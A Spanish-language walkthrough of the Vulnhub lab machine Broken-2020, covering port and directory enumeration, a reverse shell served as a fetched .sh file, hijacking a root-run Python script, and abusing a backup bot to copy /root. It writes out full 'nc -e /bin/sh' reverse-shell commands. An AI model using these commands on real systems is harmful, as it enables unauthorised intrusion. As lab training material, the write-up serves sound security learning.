[VLN] Broken-2020

Hoy vamos a hackear la maquina de Vulnhub llamada Broken-2020. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/broken-2020-1,470/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.32 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 15:53 CEST Nmap scan report for 192.168.1.32 Host is up (0.00070s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 7e:f3:33:8c:be:0c:ed:d7:0e:c6:67:cc:73:bf:c0:ab (RSA) | 256 ee:ed:74:02:0d:3f:7d:6d:45:aa:ff:f3:3a:d0:1a:d9 (ECDSA) |_ 256 d1:18:a9:ef:7f:b6:c8:a9:30:52:c8:e6:b6:ec:64:80 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Coming Soon Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.39 seconds
    Vemos si tiene algo interesante en el Apache.
    sml@Cassandra:~$ gobuster dir -u http://192.168.1.32/ -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.32/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/05/07 16:02:48 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /cms (Status: 301) /fonts (Status: 301) /images (Status: 301) /server-status (Status: 403) =============================================================== 2020/05/07 16:02:58 Finished ===============================================================
    Vamos a http://192.168.1.32/cms/ y pulsamos el boton. "Algo" se ha activado, lo cual nos ha "hackeado" el cms... Volvemos a http://192.168.1.32/cms/ y obtenemos la flag1. Ahora escaneamos el directorio cms para ver que encontramos.
    sml@Cassandra:~$ gobuster dir -u http://192.168.1.32/cms -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.32/cms [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/05/07 16:02:19 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htaccess (Status: 403) /cc (Status: 301) =============================================================== 2020/05/07 16:02:27 Finished ===============================================================
  • Exploitation
  • Vemos una carpeta llamativa asi que entramos en http://192.168.1.32/cms/cc. Vemos que la web nos pide IP y puerto... Ponemos un HTTP a la escucha, y ponemos la IP/puerto de nuestro server.
    sml@Cassandra:~$ python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 192.168.1.32 - - [07/May/2020 16:00:21] "GET /d499dda8cfb8e278c0fa0bb9732a92d5.sh HTTP/1.0" 200 -
    Podemos ver como se conecta a nuestro server y nos solicita un fichero.sh. Creamos un fichero con el nombre.sh que solicita, y de contenido ponemos que nos haga una shell inversa a nuestra maquina.
    sml@Cassandra:~$ echo "nc -e /bin/sh 192.168.1.148 5555" > d499dda8cfb8e278c0fa0bb9732a92d5.sh
  • Low shell
  • Ponemos a la escucha..
    sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.32] 52750 id uid=33(www-data) gid=33(www-data) groups=33(www-data)
    Ahora que tenemos una shell, exploramos un poco el sistema.
    python -c 'import pty; pty.spawn("/bin/sh")' $ cd /home $ ls alice $ cd alice $ ls flag.txt note.txt script $ cat flag.txt cat flag.txt {FLAG2:**Robing the rober**} $ cat note.txt Alice, Please do not install TrustMeCMS, I need check the source before PS: I created a script to clear apache log during the tests root
    Miramos la carpeta script, y el script que ha creado root.
    $ cd /home/alice/script $ cat log.py cat log.py #!/usr/bin/python2.7 import requests import os import datetime """ #Juste in case I want stop this script remotly r = requests.get("https://pastebin.com/raw/9vzu2CA5") cmd=str(r.text) check ="stopit" if check == cmd : os.system('cp /home/alice/script/log.py /home/alice/script/log.bak') """ path="/var/log/apache2" dir = os.listdir(path) date = str(datetime.datetime.now()) for logfile in dir : clear = open(path+"/"+logfile, "w") clear.truncate(0) clear.close() logfile = open("/home/alice/script/clear.log","w") logfile.write("last clear apache log "+date) logfile.close()
    Podemos modificar la carpeta, asi que creamos un script en python con el mismo nombre, y que haga de nuevo una shell inversa hasta nuestra maquina
    $ mv log.py log.bck $ echo "#!/usr/bin/python2.7" >> log.py $ echo "import os" >> log.py $ echo "os.system('nc -e /bin/sh 192.168.1.148 5556')" >> log.py
    Ponemos a la escucha de la nueva shell...y al rato...
    sml@Cassandra:~$ nc -nlvp 5556 listening on [any] 5556 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.32] 46634 python -c 'import pty; pty.spawn("/bin/sh")' $ id uid=1000(alice) gid=1000(alice) groupes=1000(alice),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev) ,109(netdev),111(bluetooth)
    Exploramos de nuevo.
    $ cd /home/alice $ ls backup flag.txt note.txt script $ cd backup $ ls flag.txt logbot.log note.txt path.txt $ cat flag.txt {FLAG3:**Power of snak**} $ cat note.txt cat note.txt Alice we have been hacked ! Please put the path of the website backup directory in path.txt, my bot will do the rest thx root
    La nota indica que pongamos el directorio que queremos recuperar, asi que ponemos /root :) y al poco tiempo....
  • (root)flag.txt
  • $ echo "/root" > path.txt $ ls flag.txt logbot.log note.txt path.txt root $ cd root $ ls flag.txt log.txt test.py $ cat flag.txt Congratulation for the root flag ! _________ / ======= \ / __________\ | ___________ | | | -root- | | | | | | | |_________| |_____________________________________________________________________ \=____________/ enjoyed this VM ? ) / """"""""""" \ I love bitcoin / / ::::::::::::: \ 1Ba6vFEamUenzrXr4scGQ8QLya7t7zYZ1S =D-' (_________________)